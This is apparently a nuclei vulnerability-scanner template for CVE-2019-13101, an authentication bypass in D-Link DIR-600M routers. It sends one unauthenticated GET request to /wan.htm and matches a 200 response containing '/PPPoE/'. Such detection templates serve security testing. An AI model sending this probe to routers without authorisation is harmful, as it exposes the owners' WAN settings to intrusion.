nuclei-templates/cves/2019/CVE-2019-13101.yaml

38 lines
1.0 KiB
YAML

id: CVE-2019-13101
info:
author: Suman_Kar
name: D-Link DIR-600M Authentication Bypass
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
severity: critical
reference:
- https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-13101
cwe-id: CWE-306
tags: cve,cve2019,dlink,router,iot
requests:
- raw:
- |
GET /wan.htm HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "/PPPoE/"
part: body
# Enhanced by mp on 2022/03/29